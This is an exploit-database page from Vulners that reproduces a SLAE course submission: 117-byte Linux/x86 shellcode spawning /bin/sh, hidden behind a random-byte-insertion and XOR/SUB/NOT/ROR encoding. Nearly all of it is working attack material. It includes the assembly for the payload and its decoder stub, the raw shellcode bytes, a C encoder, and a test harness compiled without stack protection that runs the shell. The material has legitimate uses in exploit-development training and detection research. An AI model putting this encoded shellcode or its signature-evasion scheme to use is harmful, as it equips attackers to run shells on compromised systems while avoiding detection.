Vulners
Lucene search
Linux/x86 Encoder / Decoder Shellcode (117 bytes)
# Title : Linux/x86 - Encoder - Random Bytes + XOR/SUB/NOT/ROR / Decoder - ROL/NOT/ADD/XOR execve(/bin/sh) Shellcode (117 bytes)
# Author : Xenofon Vassilakopoulos
# Date : July, 2019
# Tested on : Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture : i686 GNU/Linux
# Shellcode Length : 117 bytes
# SLAE-ID : SLAE - 1314
---------------------- execve-stack /bin/sh --------------------------------
global _start
section .text
_start:
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80
----------------------- Original Shellcode ---------------------------------
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
----------- Decoder ROL/NOT/ADD/XOR + Removing inserted random bytes -------
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi
push esi
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov dl, len
rotate:
;; apply the decoding scheme
rol byte [esi], 4
not byte [esi]
add byte [esi], 2
xor byte [esi], 0x2c
inc esi
cmp cl, dl
je init
inc cl
jmp short rotate
init:
pop esi
lea edi, [esi +1]
xor eax, eax
mov al, 1
xor ecx, ecx
decode:
cmp cl, dl
je EncodedShellcode
mov bl, byte [esi + eax + 1]
mov byte [edi], bl
inc edi
inc cl
add al, 2
jmp short decode
call_shellcode:
call decoder
EncodedShellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3
len equ $-EncodedShellcode
--------- Encoder - Random Bytes Insertion + XOR/SUB/NOT/ROR ---------------
xenofon@slae:~/Documents/Assignment4$ gcc -o encoder encoder.c
xenofon@slae:~/Documents/Assignment4$ ./encoder
Shellcode:
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Shellcode Length 25
Decoded Shellcode:
0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80,
Encoded shellcode
0x4e,0x70,0x51,0x61,0x58,0xf4,0xdb,0xe1,0xef,0xef,0xef,0x6a,0x2a,0x41,0xdb,0x4c,0xdb,0x20,0xef,0xbf,0x3b,0x78,0xcb,0x77,0xfb,0x57,0xc5,0x90,0x23,0x62,0x58,0xf0,0xc5,0xe1,0x33,0xe5,0x28,0x9d,0xc5,0x3d,0x43,0xf6,0x56,0x29,0xad,0x29,0x02,0x57,0x55,0x34,
Encoded Shellcode Length 50
xenofon@slae:~/Documents/Assignment4$ cat encoder.c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#define DEC 0x2 // the value that will be used to substract every byte
#define XORVAL 0x2c // the value that will be used to xor with every byte
// execve stack shellcode /bin/sh
unsigned char shellcode[] = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
void main()
{
int rot = 4; //right rotation 4 bits
printf("\n\nShellcode:\n\n");
int o;
for (o=0; o<strlen(shellcode); o++) {
printf("\\x%02x", shellcode[o]);
}
printf("\n\nShellcode Length %d\n",sizeof(shellcode)-1);
printf("\n\nDecoded Shellcode:\n\n");
o=0;
for (o; o<strlen(shellcode); o++) {
printf("0x%02x,", shellcode[o]);
}
printf("\n");
int i;
unsigned char *buffer = (char*)malloc(sizeof(shellcode)*2);
srand((unsigned int)time(NULL));
unsigned char *shellcode2=(char*)malloc(sizeof(shellcode)*2);
// placeholder to copy the random bytes using rand
unsigned char shellcode3[] = "\xbb";
int l = 0;
int k = 0;
int j;
// random byte insertion into even location
for (i=0; i<(strlen(shellcode)*2); i++) {
// generate random bytes
buffer[i] = rand() & 0xff;
memcpy(&shellcode3[0],(unsigned char*)&buffer[i],sizeof(buffer[i]));
k = i % 2;
if (k == 0)
{
shellcode2[i] = shellcode[l];
l++;
}
else
{
shellcode2[i] = shellcode3[0];
}
}
// apply the encoding scheme
for (i=0; i<strlen(shellcode2); i++) {
// XOR every byte with 0x2c
shellcode2[i] = shellcode2[i] ^ XORVAL;
// subtract every byte by 2
shellcode2[i] = shellcode2[i] - DEC;
// one's complement negation
shellcode2[i] = ~shellcode2[i];
// perform the ROR method
shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot));
}
// print encoded shellcode
printf("\nEncoded shellcode\n\n");
i=0;
for (i; i<strlen(shellcode2); i++) {
printf("0x%02x,", shellcode2[i]);
}
printf("\n\nEncoded Shellcode Length %d\n",strlen(shellcode2));
free(shellcode2);
free(buffer);
printf("\n\n");
}
----------------------------------- Shellcode -------------------------------------
xenofon@slae:~/Documents/Assignment4$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
xenofon@slae:~/Documents/Assignment4$ ./shellcode
Shellcode Length: 117
$ whoami
xenofon
xenofon@slae:~/Documents/Assignment4$ cat shellcode.c
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\xeb\x3c\x5e\x56\x31\xdb\x31\xc9\x31\xd2\xb2\x32\xc0\x06"
"\x04\xf6\x16\x80\x06\x02\x80\x36\x2c\x46\x38\xd1\x74\x04"
"\xfe\xc1\xeb\xec\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xc9"
"\x8a\x1c\x06\x38\xd1\x74\x12\x8a\x5c\x06\x01\x88\x1f\x47"
"\xfe\xc1\x04\x02\xeb\xec\xe8\xbf\xff\xff\xff\x4e\xd1\x51"
"\xb4\x58\x37\xdb\x55\xef\x3d\xef\xbd\x2a\x59\xdb\x81\xdb"
"\x56\xef\xae\x3b\x1a\xcb\xfa\xfb\x43\xc5\x49\x23\x12\x58"
"\xd2\xc5\xee\x33\x82\x28\x49\xc5\xc3\x43\x30\x56\xcb\xad"
"\xe1\x02\x8b\x55\x84";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Dec 2019 00:00Current
7.1High risk
Vulners AI Score7.1